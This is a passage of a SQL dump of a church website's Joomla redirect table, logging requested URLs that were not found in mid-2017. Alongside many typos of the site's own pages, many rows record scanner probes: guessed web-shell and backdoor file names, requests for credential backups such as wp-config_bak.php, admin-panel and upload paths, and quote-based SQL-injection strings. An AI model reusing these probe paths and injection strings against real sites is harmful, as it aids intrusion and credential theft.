(5721, 'http://www.lifeoasisinternationalchurch.org/yo', NULL, '', '', 2, 0, '2017-07-09 08:54:49', '0000-00-00 00:00:00', 301),
(5722, 'http://www.lifeoasisinternationalchurch.org/liv', NULL, '', '', 2, 0, '2017-07-09 08:54:50', '0000-00-00 00:00:00', 301),
(5723, 'http://www.lifeoasisinternationalchurch.org/livestreami', NULL, '', '', 2, 0, '2017-07-09 08:54:54', '0000-00-00 00:00:00', 301),
(5724, 'http://www.lifeoasisinternationalchurch.org/livest', NULL, '', '', 2, 0, '2017-07-09 08:54:56', '0000-00-00 00:00:00', 301),
(5725, 'http://www.lifeoasisinternationalchurch.org/livestreamin', NULL, '', '', 2, 0, '2017-07-09 08:54:56', '0000-00-00 00:00:00', 301),
(5726, 'http://www.lifeoasisinternationalchurch.org/livestreamib', NULL, '', '', 1, 0, '2017-07-09 08:54:56', '0000-00-00 00:00:00', 301),
(5727, 'http://www.lifeoasisinternationalchurch.org/livestrea', NULL, '', '', 2, 0, '2017-07-09 08:54:57', '0000-00-00 00:00:00', 301),
(5728, 'http://www.lifeoasisinternationalchurch.org/livestre', NULL, '', '', 2, 0, '2017-07-09 08:54:57', '0000-00-00 00:00:00', 301),
(5729, 'http://www.lifeoasisinternationalchurch.org/livestreamibg', NULL, '', '', 1, 0, '2017-07-09 08:54:58', '0000-00-00 00:00:00', 301),
(5730, 'http://www.lifeoasisinternationalchurch.org/lives', NULL, '', '', 2, 0, '2017-07-09 08:55:01', '0000-00-00 00:00:00', 301),
(5731, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1499591702551', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-07-09 09:15:02', '0000-00-00 00:00:00', 301),
(5732, 'http://lifeoasisinternationalchurch.org/wp-pas.php', NULL, '', '', 1, 0, '2017-07-09 23:47:34', '0000-00-00 00:00:00', 301),
(5733, 'http://lifeoasisinternationalchurch.org/vision.html', NULL, '', '', 1, 0, '2017-07-10 05:38:22', '0000-00-00 00:00:00', 301),
(5734, 'http://lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/24', NULL, '', '', 1, 0, '2017-07-10 08:16:49', '0000-00-00 00:00:00', 301),
(5735, 'http://lifeoasisinternationalchurch.org/keith.php', NULL, '', '', 1, 0, '2017-07-10 08:17:24', '0000-00-00 00:00:00', 301),
(5736, 'http://www.lifeoasisinternationalchurch.org/?itemid=212', NULL, '', '', 1, 0, '2017-07-10 09:51:02', '0000-00-00 00:00:00', 301),
(5737, 'http://www.lifeoasisinternationalchurch.org/modules/mod_jmodule/index.html', NULL, 'http://www.lifeoasisinternationalchurch.org/modules/mod_jmodule/index.html', '', 1, 0, '2017-07-10 18:45:47', '0000-00-00 00:00:00', 301),
(5738, 'http://lifeoasisinternationalchurch.org/modules/mod_jmodule/index.html', NULL, 'http://lifeoasisinternationalchurch.org/modules/mod_jmodule/index.html', '', 1, 0, '2017-07-11 00:13:51', '0000-00-00 00:00:00', 301),
(5739, 'http://lifeoasisinternationalchurch.org/backup.bak.php', NULL, '', '', 1, 0, '2017-07-11 08:33:39', '0000-00-00 00:00:00', 301),
(5740, 'http://www.lifeoasisinternationalchurch.org/login-form.html', NULL, '', '', 1, 0, '2017-07-11 20:41:29', '0000-00-00 00:00:00', 301),
(5741, 'http://www.lifeoasisinternationalchurch.org/index.php/log-out', NULL, '', '', 1, 0, '2017-07-11 20:41:30', '0000-00-00 00:00:00', 301),
(5742, 'http://www.lifeoasisinternationalchurch.org/loggin.html', NULL, '', '', 1, 0, '2017-07-11 20:41:30', '0000-00-00 00:00:00', 301),
(5743, 'http://www.lifeoasisinternationalchurch.org/login-form', NULL, '', '', 1, 0, '2017-07-11 20:41:32', '0000-00-00 00:00:00', 301),
(5744, 'http://www.lifeoasisinternationalchurch.org/user-profile?view=login', NULL, '', '', 1, 0, '2017-07-11 20:41:34', '0000-00-00 00:00:00', 301),
(5745, 'http://www.lifeoasisinternationalchurch.org/streamingzz', NULL, '', '', 1, 0, '2017-07-12 14:13:07', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(5746, 'http://www.lifeoasisinternationalchurch.org/modules/mod_j2module/index.html', NULL, 'http://www.lifeoasisinternationalchurch.org/modules/mod_j2module/index.html', '', 1, 0, '2017-07-12 15:14:24', '0000-00-00 00:00:00', 301),
(5747, 'http://lifeoasisinternationalchurch.org/llx.php', NULL, '', '', 1, 0, '2017-07-12 17:16:12', '0000-00-00 00:00:00', 301),
(5748, 'http://www.lifeoasisinternationalchurch.org/zxcvbnm.php?hjjjf', NULL, 'http://www.lifeoasisinternationalchurch.org/zxcvbnm.php?hjjjf', '', 1, 0, '2017-07-12 17:35:28', '0000-00-00 00:00:00', 301),
(5749, 'http://lifeoasisinternationalchurch.org/streamibg', NULL, '', '', 2, 0, '2017-07-12 18:13:41', '0000-00-00 00:00:00', 301),
(5750, 'http://lifeoasisinternationalchurch.org/modules/mod_j2module/index.html', NULL, 'http://lifeoasisinternationalchurch.org/modules/mod_j2module/index.html', '', 1, 0, '2017-07-12 20:45:53', '0000-00-00 00:00:00', 301),
(5751, 'https://www.lifeoasisinternationalchurch.org/living by the answer message today', NULL, '', '', 1, 0, '2017-07-12 22:20:47', '0000-00-00 00:00:00', 301),
(5752, 'http://lifeoasisinternationalchurch.org/codules.php', NULL, '', '', 1, 0, '2017-07-13 01:46:14', '0000-00-00 00:00:00', 301),
(5753, 'http://www.lifeoasisinternationalchurch.org/trd.php', NULL, 'http://www.lifeoasisinternationalchurch.org/trd.php', '', 1, 0, '2017-07-13 04:49:14', '0000-00-00 00:00:00', 301),
(5754, 'http://lifeoasisinternationalchurch.org/trd.php', NULL, 'http://lifeoasisinternationalchurch.org/trd.php', '', 1, 0, '2017-07-13 09:42:36', '0000-00-00 00:00:00', 301),
(5755, 'http://lifeoasisinternationalchurch.org/wp-index.php', NULL, '', '', 1, 0, '2017-07-13 11:30:50', '0000-00-00 00:00:00', 301),
(5756, 'http://lifeoasisinternationalchurch.org/wp-honor.php', NULL, '', '', 2, 0, '2017-07-13 13:05:40', '0000-00-00 00:00:00', 301),
(5757, 'http://lifeoasisinternationalchurch.org/phqmv.php', NULL, '', '', 1, 0, '2017-07-13 23:10:24', '0000-00-00 00:00:00', 301),
(5758, 'http://lifeoasisinternationalchurch.org/ups.php', NULL, 'http://www.google.com/', '', 3, 0, '2017-07-14 09:28:23', '0000-00-00 00:00:00', 301),
(5759, 'http://www.lifeoasisinternationalchurch.org/letter', NULL, '', '', 1, 0, '2017-07-14 10:04:50', '0000-00-00 00:00:00', 301),
(5760, 'http://www.lifeoasisinternationalchurch.org/ups.php', NULL, 'http://www.lifeoasisinternationalchurch.org/ups.php', '', 2, 0, '2017-07-14 15:53:18', '0000-00-00 00:00:00', 301),
(5761, 'http://lifeoasisinternationalchurch.org/google.php', NULL, '', '', 1, 0, '2017-07-14 18:43:02', '0000-00-00 00:00:00', 301),
(5762, 'http://www.lifeoasisinternationalchurch.org/up.php', NULL, '', '', 18, 0, '2017-07-15 05:39:00', '0000-00-00 00:00:00', 301),
(5763, 'https://142.4.21.132/owa-autodiscover-ews', NULL, '', '', 2, 0, '2017-07-15 06:17:51', '0000-00-00 00:00:00', 301),
(5764, 'http://lifeoasisinternationalchurch.org/links/add.php', NULL, '', '', 1, 0, '2017-07-15 13:39:35', '0000-00-00 00:00:00', 301),
(5765, 'http://lifeoasisinternationalchurch.org/bgeiis.php', NULL, '', '', 1, 0, '2017-07-15 15:02:25', '0000-00-00 00:00:00', 301),
(5766, 'http://lifeoasisinternationalchurch.org/>', NULL, '', '', 1, 0, '2017-07-15 17:50:42', '0000-00-00 00:00:00', 301),
(5767, 'http://www.lifeoasisinternationalchurch.org/streamingwill', NULL, '', '', 1, 0, '2017-07-15 21:42:55', '0000-00-00 00:00:00', 301),
(5768, 'http://www.lifeoasisinternationalchurch.org/streaminglook', NULL, '', '', 1, 0, '2017-07-15 21:45:30', '0000-00-00 00:00:00', 301),
(5769, 'http://www.lifeoasisinternationalchurch.org/livestreamimg', NULL, '', '', 1, 0, '2017-07-16 06:16:00', '0000-00-00 00:00:00', 301),
(5770, 'http://www.lifeoasisinternationalchurch.org/streaming/google', NULL, '', '', 1, 0, '2017-07-16 07:05:58', '0000-00-00 00:00:00', 301),
(5771, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1500192845152', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-07-16 08:14:03', '0000-00-00 00:00:00', 301),
(5772, 'http://www.lifeoasisinternationalchurch.org/streaminghttp://www.lifeoasisinternationalchurch.org/streaming', NULL, '', '', 1, 0, '2017-07-16 11:11:18', '0000-00-00 00:00:00', 301),
(5773, 'http://www.lifeoasisinternationalchurch.org/programmes.html', NULL, '', '', 1, 0, '2017-07-16 15:24:50', '0000-00-00 00:00:00', 301),
(5774, 'http://lifeoasisinternationalchurch.org/index.php/using-joomla/extensions/components/users-component/registration-form', NULL, '', '', 1, 0, '2017-07-16 17:58:38', '0000-00-00 00:00:00', 301),
(5775, 'http://lifeoasisinternationalchurch.org/resources/blog/item/5', NULL, '', '', 1, 0, '2017-07-17 05:10:04', '0000-00-00 00:00:00', 301),
(5776, 'http://lifeoasisinternationalchurch.org/layouts/system_info.php', NULL, 'http://lifeoasisinternationalchurch.org/layouts/system_info.php', '', 1, 0, '2017-07-18 01:19:32', '0000-00-00 00:00:00', 301),
(5777, 'http://www.lifeoasisinternationalchurch.org/-tooexclusivedon', NULL, '', '', 1, 0, '2017-07-18 02:21:00', '0000-00-00 00:00:00', 301),
(5778, 'http://lifeoasisinternationalchurch.org/bin/system_info.php', NULL, 'http://lifeoasisinternationalchurch.org/bin/system_info.php', '', 1, 0, '2017-07-18 02:33:57', '0000-00-00 00:00:00', 301),
(5779, 'http://lifeoasisinternationalchurch.org/system_info.php', NULL, 'http://lifeoasisinternationalchurch.org/system_info.php', '', 1, 0, '2017-07-18 04:45:06', '0000-00-00 00:00:00', 301),
(5780, 'http://lifeoasisinternationalchurch.org/language/system_info.php', NULL, 'http://lifeoasisinternationalchurch.org/language/system_info.php', '', 1, 0, '2017-07-18 10:29:01', '0000-00-00 00:00:00', 301),
(5781, 'http://lifeoasisinternationalchurch.org/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/logo_img.php', '', 1, 0, '2017-07-18 14:49:54', '0000-00-00 00:00:00', 301),
(5782, 'http://lifeoasisinternationalchurch.org/logs/system_info.php', NULL, 'http://lifeoasisinternationalchurch.org/logs/system_info.php', '', 1, 0, '2017-07-18 19:06:29', '0000-00-00 00:00:00', 301),
(5783, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/2', NULL, '', '', 17, 0, '2017-07-18 20:54:19', '0000-00-00 00:00:00', 301),
(5784, 'https://lifeoasisinternationalchurch.org/59-prophetic-words-for-day-7', NULL, '', '', 4, 0, '2017-07-19 05:44:39', '0000-00-00 00:00:00', 301),
(5785, 'http://lifeoasisinternationalchurch.org/cli/system_info.php', NULL, 'http://lifeoasisinternationalchurch.org/cli/system_info.php', '', 1, 0, '2017-07-19 05:58:57', '0000-00-00 00:00:00', 301),
(5786, 'https://www.lifeoasisinternationalchurch.org/stre', NULL, '', '', 41, 0, '2017-07-19 16:45:59', '0000-00-00 00:00:00', 301),
(5787, 'http://lifeoasisinternationalchurch.org/web/ui/page/error.html', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-07-19 18:29:36', '0000-00-00 00:00:00', 301),
(5788, 'https://www.lifeoasisinternationalchurch.org/?format=feed\'a=0&type=rss', NULL, 'https://www.lifeoasisinternationalchurch.org/?format=feed\'A=0&type=rss', '', 1, 0, '2017-07-19 18:41:41', '0000-00-00 00:00:00', 301),
(5789, 'http://lifeoasisinternationalchurch.org/wp-config_bak.php?x=1', NULL, '', '', 1, 0, '2017-07-19 18:43:24', '0000-00-00 00:00:00', 301),
(5790, 'http://lifeoasisinternationalchurch.org/configurationbak.php', NULL, '', '', 1, 0, '2017-07-20 05:01:26', '0000-00-00 00:00:00', 301),
(5791, 'http://lifeoasisinternationalchurch.org/media/system_info.php', NULL, 'http://lifeoasisinternationalchurch.org/media/system_info.php', '', 1, 0, '2017-07-20 10:20:09', '0000-00-00 00:00:00', 301),
(5792, 'http://lifeoasisinternationalchurch.org/function-sync.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-07-21 00:05:55', '0000-00-00 00:00:00', 301),
(5793, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1500619211046', NULL, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/category/6-family-women', '', 1, 0, '2017-07-21 06:40:10', '0000-00-00 00:00:00', 301),
(5794, 'http://lifeoasisinternationalchurch.org/vbseocp.php', NULL, '', '', 3, 0, '2017-07-22 00:16:04', '0000-00-00 00:00:00', 301),
(5795, 'https://www.lifeoasisinternationalchurch.org/resources/privatestreaming', NULL, '', '', 6, 0, '2017-07-22 08:57:39', '0000-00-00 00:00:00', 301),
(5796, 'http://www.lifeoasisinternationalchurch.org//index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, '', '', 2, 0, '2017-07-22 14:34:57', '0000-00-00 00:00:00', 301),
(5797, 'http://www.lifeoasisinternationalchurch.org/training/live-streaming', NULL, '', '', 1, 0, '2017-07-22 18:14:48', '0000-00-00 00:00:00', 301),
(5798, 'http://lifeoasisinternationalchurch.org/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php', NULL, '', '', 1, 0, '2017-07-23 00:15:35', '0000-00-00 00:00:00', 301),
(5799, 'https://www.lifeoasisinternationalchurch.org/resources/private', NULL, '', '', 97, 0, '2017-07-23 13:06:00', '0000-00-00 00:00:00', 301),
(5800, 'http://www.lifeoasisinternationalchurch.org/stewarrd', NULL, '', '', 1, 0, '2017-07-23 15:00:56', '0000-00-00 00:00:00', 301),
(5801, 'http://www.lifeoasisinternationalchurch.org/protocol.html', NULL, '', '', 1, 0, '2017-07-24 13:16:36', '0000-00-00 00:00:00', 301),
(5802, 'http://www.lifeoasisinternationalchurch.org/mp3/iphonemesseges', NULL, '', '', 1, 0, '2017-07-24 19:40:52', '0000-00-00 00:00:00', 301),
(5803, 'http://lifeoasisinternationalchurch.org/notify-notifiy_yellow_coaching?ahr0cdovl2xpzmvvyxnpc2ludgvybmf0aw9uywxjahvyy2gub3jnlw==;xx8ymde+eo709fk8icorpdlgi01y1b/wwbxzx0c7w0w=', NULL, '', '', 1, 0, '2017-07-25 11:44:01', '0000-00-00 00:00:00', 301),
(5804, 'http://www.lifeoasisinternationalchurch.org/?format=feed\'a=0&type=rss', NULL, 'http://www.lifeoasisinternationalchurch.org/?format=feed\'A=0&type=rss', '', 1, 0, '2017-07-25 13:53:23', '0000-00-00 00:00:00', 301),
(5805, 'http://www.lifeoasisinternationalchurch.org/registration.html', NULL, 'http://www.lifeoasisinternationalchurch.org/registration.html', '', 1, 0, '2017-07-25 15:21:34', '0000-00-00 00:00:00', 301),
(5806, 'http://lifeoasisinternationalchurch.org/registration.html', NULL, 'http://lifeoasisinternationalchurch.org/registration.html', '', 1, 0, '2017-07-25 15:21:35', '0000-00-00 00:00:00', 301),
(5807, 'http://lifeoasisinternationalchurch.org/prie', NULL, '', '', 3, 0, '2017-07-25 15:23:39', '0000-00-00 00:00:00', 301),
(5808, 'http://lifeoasisinternationalchurch.org/streaming/steward', NULL, '', '', 1, 0, '2017-07-25 16:03:02', '0000-00-00 00:00:00', 301),
(5809, 'http://www.lifeoasisinternationalchurch.org/special stewardstreaming', NULL, '', '', 1, 0, '2017-07-25 17:19:52', '0000-00-00 00:00:00', 301),
(5810, 'http://www.lifeoasisinternationalchurch.org/register', NULL, 'http://www.lifeoasisinternationalchurch.org/register', '', 1, 0, '2017-07-25 19:18:41', '0000-00-00 00:00:00', 301),
(5811, 'http://lifeoasisinternationalchurch.org/register', NULL, 'http://lifeoasisinternationalchurch.org/register', '', 1, 0, '2017-07-25 19:18:42', '0000-00-00 00:00:00', 301),
(5812, 'http://www.lifeoasisinternationalchurch.org/streaminggo', NULL, '', '', 1, 0, '2017-07-25 20:17:37', '0000-00-00 00:00:00', 301),
(5813, 'http://lifeoasisinternationalchurch.org/streaming/pivate', NULL, '', '', 1, 0, '2017-07-25 21:59:18', '0000-00-00 00:00:00', 301),
(5814, 'http://www.lifeoasisinternationalchurch.org/users/registration.html', NULL, 'http://www.lifeoasisinternationalchurch.org/users/registration.html', '', 1, 0, '2017-07-25 22:04:04', '0000-00-00 00:00:00', 301),
(5815, 'http://lifeoasisinternationalchurch.org/users/registration.html', NULL, 'http://lifeoasisinternationalchurch.org/users/registration.html', '', 1, 0, '2017-07-25 22:04:04', '0000-00-00 00:00:00', 301),
(5816, 'http://www.lifeoasisinternationalchurch.org/create-an-account.html', NULL, 'http://www.lifeoasisinternationalchurch.org/create-an-account.html', '', 1, 0, '2017-07-25 22:17:44', '0000-00-00 00:00:00', 301),
(5817, 'http://lifeoasisinternationalchurch.org/component/content/article/18-loic/44-programme', NULL, '', '', 1, 0, '2017-07-26 04:52:29', '0000-00-00 00:00:00', 301),
(5818, 'http://lifeoasisinternationalchurch.org/www/index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-07-26 05:34:35', '0000-00-00 00:00:00', 301),
(5819, 'http://lifeoasisinternationalchurch.org/www/index.php/component/users/?view=registration', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-07-26 05:34:38', '0000-00-00 00:00:00', 301),
(5820, 'http://lifeoasisinternationalchurch.org/www/index.php?option=com_user&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php/component/users/?view=registration', '', 1, 0, '2017-07-26 05:34:39', '0000-00-00 00:00:00', 301),
(5821, 'http://lifeoasisinternationalchurch.org/www/index.php/component/user/?task=register', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 1, 0, '2017-07-26 05:34:39', '0000-00-00 00:00:00', 301),
(5822, 'http://lifeoasisinternationalchurch.org/www/component/users/?view=registration', NULL, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=login&Itemid=101', '', 1, 0, '2017-07-26 05:34:41', '0000-00-00 00:00:00', 301),
(5823, 'http://lifeoasisinternationalchurch.org/www/component/user/?task=register', NULL, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=registration', '', 1, 0, '2017-07-26 05:34:42', '0000-00-00 00:00:00', 301),
(5824, 'http://www.lifeoasisinternationalchurch.org/login.php', NULL, '', '', 3, 0, '2017-07-26 14:09:40', '0000-00-00 00:00:00', 301),
(5825, 'http://www.lifeoasisinternationalchurch.org/panel/login.php', NULL, '', '', 1, 0, '2017-07-26 14:19:12', '0000-00-00 00:00:00', 301),
(5826, 'http://www.lifeoasisinternationalchurch.org/client/accept.php', NULL, '', '', 1, 0, '2017-07-26 14:22:57', '0000-00-00 00:00:00', 301),
(5827, 'http://www.lifeoasisinternationalchurch.org/post/echo', NULL, '', '', 1, 0, '2017-07-26 14:29:51', '0000-00-00 00:00:00', 301),
(5828, 'http://www.lifeoasisinternationalchurch.org/path/index.php', NULL, '', '', 1, 0, '2017-07-26 14:30:41', '0000-00-00 00:00:00', 301),
(5829, 'http://www.lifeoasisinternationalchurch.org/prayer/css', NULL, '', '', 2, 0, '2017-07-26 14:30:54', '0000-00-00 00:00:00', 301),
(5830, 'http://www.lifeoasisinternationalchurch.org/prayer/files', NULL, '', '', 2, 0, '2017-07-26 14:30:56', '0000-00-00 00:00:00', 301),
(5831, 'http://www.lifeoasisinternationalchurch.org/prayer/img/back', NULL, '', '', 1, 0, '2017-07-26 14:30:59', '0000-00-00 00:00:00', 301),
(5832, 'http://www.lifeoasisinternationalchurch.org/prayer/img/flags', NULL, '', '', 2, 0, '2017-07-26 14:31:10', '0000-00-00 00:00:00', 301),
(5833, 'http://www.lifeoasisinternationalchurch.org/prayer/img/softs', NULL, '', '', 2, 0, '2017-07-26 14:31:13', '0000-00-00 00:00:00', 301),
(5834, 'http://www.lifeoasisinternationalchurch.org/prayer/ img/back', NULL, '', '', 1, 0, '2017-07-26 14:33:24', '0000-00-00 00:00:00', 301),
(5835, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/bots.php', NULL, '', '', 1, 0, '2017-07-26 14:57:43', '0000-00-00 00:00:00', 301),
(5836, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/edituser.php', NULL, '', '', 1, 0, '2017-07-26 14:57:46', '0000-00-00 00:00:00', 301),
(5837, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/main.php', NULL, '', '', 1, 0, '2017-07-26 14:58:07', '0000-00-00 00:00:00', 301),
(5838, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/tasks.php', NULL, '', '', 1, 0, '2017-07-26 14:58:14', '0000-00-00 00:00:00', 301),
(5839, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/users.php', NULL, '', '', 1, 0, '2017-07-26 14:58:17', '0000-00-00 00:00:00', 301),
(5840, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/logs.php', NULL, '', '', 1, 0, '2017-07-26 14:59:01', '0000-00-00 00:00:00', 301),
(5841, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/account.php', NULL, '', '', 1, 0, '2017-07-26 14:59:06', '0000-00-00 00:00:00', 301),
(5842, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/settings.php', NULL, '', '', 1, 0, '2017-07-26 14:59:09', '0000-00-00 00:00:00', 301),
(5843, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/details.php', NULL, '', '', 1, 0, '2017-07-26 14:59:12', '0000-00-00 00:00:00', 301),
(5844, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/logout.php', NULL, '', '', 1, 0, '2017-07-26 14:59:21', '0000-00-00 00:00:00', 301),
(5845, 'http://www.lifeoasisinternationalchurch.org/prayer/pages/help.php', NULL, '', '', 1, 0, '2017-07-26 14:59:27', '0000-00-00 00:00:00', 301),
(5846, 'http://www.lifeoasisinternationalchurch.org/prayer/login.php', NULL, '', '', 1, 0, '2017-07-26 15:06:59', '0000-00-00 00:00:00', 301),
(5847, 'http://www.lifeoasisinternationalchurch.org/lif', NULL, '', '', 1, 0, '2017-07-26 17:25:12', '0000-00-00 00:00:00', 301),
(5848, 'http://www.lifeoasisinternationalchurch.org/lifd', NULL, '', '', 1, 0, '2017-07-26 17:25:13', '0000-00-00 00:00:00', 301),
(5849, 'http://www.lifeoasisinternationalchurch.org/life', NULL, '', '', 1, 0, '2017-07-26 17:25:14', '0000-00-00 00:00:00', 301),
(5850, 'http://www.lifeoasisinternationalchurch.org/liveste', NULL, '', '', 1, 0, '2017-07-26 17:25:23', '0000-00-00 00:00:00', 301),
(5851, 'http://www.lifeoasisinternationalchurch.org/livestee', NULL, '', '', 1, 0, '2017-07-26 17:25:23', '0000-00-00 00:00:00', 301),
(5852, 'http://lifeoasisinternationalchurch.org/media/syst', NULL, '', '', 1, 0, '2017-07-26 20:10:05', '0000-00-00 00:00:00', 301),
(5853, 'http://lifeoasisinternationalchurch.org/media/widg', NULL, '', '', 1, 0, '2017-07-26 22:16:36', '0000-00-00 00:00:00', 301),
(5854, 'http://lifeoasisinternationalchurch.org/component/users/?view=remind\'a=0&itemid=101', NULL, 'http://lifeoasisinternationalchurch.org/component/users/?view=remind\'A=0&Itemid=101', '', 1, 0, '2017-07-27 00:22:36', '0000-00-00 00:00:00', 301),
(5855, 'http://lifeoasisinternationalchurch.org/component/jlexblock', NULL, '', '', 2, 0, '2017-07-28 02:46:21', '0000-00-00 00:00:00', 301),
(5856, 'http://lifeoasisinternationalchurch.org/modules.php?name=your_account', NULL, '', '', 1, 0, '2017-07-29 07:21:26', '0000-00-00 00:00:00', 301),
(5857, 'http://lifeoasisinternationalchurch.org/guestbook.php', NULL, '', '', 3, 0, '2017-07-29 07:21:31', '0000-00-00 00:00:00', 301),
(5858, 'http://lifeoasisinternationalchurch.org/gastenboek.php', NULL, '', '', 1, 0, '2017-07-29 07:21:32', '0000-00-00 00:00:00', 301),
(5859, 'http://lifeoasisinternationalchurch.org/cgi/guestbook?page=1', NULL, '', '', 1, 0, '2017-07-29 07:21:48', '0000-00-00 00:00:00', 301),
(5860, 'http://lifeoasisinternationalchurch.org/jax_guestbook.php', NULL, '', '', 1, 0, '2017-07-29 07:21:53', '0000-00-00 00:00:00', 301),
(5861, 'http://lifeoasisinternationalchurch.org/yapgb.php', NULL, '', '', 1, 0, '2017-07-29 07:21:58', '0000-00-00 00:00:00', 301),
(5862, 'http://lifeoasisinternationalchurch.org/scarbook.php', NULL, '', '', 1, 0, '2017-07-29 07:22:07', '0000-00-00 00:00:00', 301),
(5863, 'http://lifeoasisinternationalchurch.org/guestbook.html', NULL, '', '', 1, 0, '2017-07-29 07:22:11', '0000-00-00 00:00:00', 301),
(5864, 'http://lifeoasisinternationalchurch.org/gaestebuch.php', NULL, '', '', 1, 0, '2017-07-29 07:22:11', '0000-00-00 00:00:00', 301),
(5865, 'http://lifeoasisinternationalchurch.org/apps/guestbook', NULL, '', '', 1, 0, '2017-07-29 07:22:12', '0000-00-00 00:00:00', 301),
(5866, 'http://lifeoasisinternationalchurch.org/spiritme/component/users/?view=registration', NULL, '', '', 1, 0, '2017-07-29 07:22:28', '0000-00-00 00:00:00', 301),
(5867, 'http://lifeoasisinternationalchurch.org/spiritme/registratsiya/registers', NULL, '', '', 1, 0, '2017-07-29 07:22:34', '0000-00-00 00:00:00', 301),
(5868, 'http://lifeoasisinternationalchurch.org/spiritme/component/comprofiler/registers.html', NULL, '', '', 1, 0, '2017-07-29 07:22:38', '0000-00-00 00:00:00', 301),
(5869, 'http://lifeoasisinternationalchurch.org/spiritme/user/registration', NULL, '', '', 1, 0, '2017-07-29 07:22:39', '0000-00-00 00:00:00', 301),
(5870, 'http://lifeoasisinternationalchurch.org/spiritme/component/option,com_comprofiler/task,registers/', NULL, '', '', 1, 0, '2017-07-29 07:22:53', '0000-00-00 00:00:00', 301),
(5871, 'http://lifeoasisinternationalchurch.org/spiritme/registration', NULL, '', '', 1, 0, '2017-07-29 07:23:00', '0000-00-00 00:00:00', 301),
(5872, 'http://lifeoasisinternationalchurch.org/pma/', NULL, '', '', 1, 0, '2017-07-29 09:00:53', '0000-00-00 00:00:00', 301),
(5873, 'http://lifeoasisinternationalchurch.org/myadmin/', NULL, '', '', 1, 0, '2017-07-29 09:00:54', '0000-00-00 00:00:00', 301),
(5874, 'http://lifeoasisinternationalchurch.org/sql/', NULL, '', '', 1, 0, '2017-07-29 09:00:55', '0000-00-00 00:00:00', 301),
(5875, 'http://www.lifeoasisinternationalchurch.org/resources/live-streaming/jilfi', NULL, '', '', 1, 0, '2017-07-29 09:50:23', '0000-00-00 00:00:00', 301),
(5876, 'http://www.lifeoasisinternationalchurch.org/training', NULL, 'http://www.lifeoasisinternationalchurch.org/training', '', 6, 0, '2017-07-29 18:26:49', '0000-00-00 00:00:00', 301),
(5877, 'http://lifeoasisinternationalchurch.org/fckeditor/editor/', NULL, '', '', 1, 0, '2017-08-01 01:17:03', '0000-00-00 00:00:00', 301),
(5878, 'http://lifeoasisinternationalchurch.org/wp', NULL, '', '', 1, 0, '2017-08-01 15:42:11', '0000-00-00 00:00:00', 301),
(5879, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/17', NULL, '', '', 1, 0, '2017-08-02 14:07:45', '0000-00-00 00:00:00', 301),
(5880, 'https://www.lifeoasisinternationalchurch.org/lifestreaming', NULL, '', '', 16, 0, '2017-08-02 16:37:12', '0000-00-00 00:00:00', 301),
(5881, 'https://www.lifeoasisinternationalchurch.org/component/users/index.php?option=com_user&view=register', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 6, 0, '2017-08-03 03:19:55', '0000-00-00 00:00:00', 301),
(5882, 'https://www.lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', NULL, 'https://www.lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', '', 6, 0, '2017-08-03 03:19:56', '0000-00-00 00:00:00', 301),
(5883, 'http://lifeoasisinternationalchurch.org/index.php/265-day-5-of-21-days-fasting-and-prayer-november', NULL, '', '', 1, 0, '2017-08-03 18:03:18', '0000-00-00 00:00:00', 301),
(5884, 'http://www.lifeoasisinternationalchurch.org/thronemusic', NULL, '', '', 1, 0, '2017-08-04 03:29:10', '0000-00-00 00:00:00', 301),
(5885, 'http://www.lifeoasisinternationalchurch.org/csi?s=instant_proxy&v=2&action=menuafterload&id=friewc7zhcbi-wgtt4eqca', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-08-04 06:46:21', '0000-00-00 00:00:00', 301),
(5886, 'http://www.lifeoasisinternationalchurch.org/gobcwel.html', NULL, '', '', 1, 0, '2017-08-04 09:03:24', '0000-00-00 00:00:00', 301),
(5887, 'http://lifeoasisinternationalchurch.org/index.php/250-day-15-of-21-days-fasting-and-prayer-october', NULL, '', '', 1, 0, '2017-08-04 17:33:27', '0000-00-00 00:00:00', 301),
(5888, 'http://www.lifeoasisinternationalchurch.org/about-us/the-churc', NULL, '', '', 1, 0, '2017-08-05 04:29:56', '0000-00-00 00:00:00', 301),
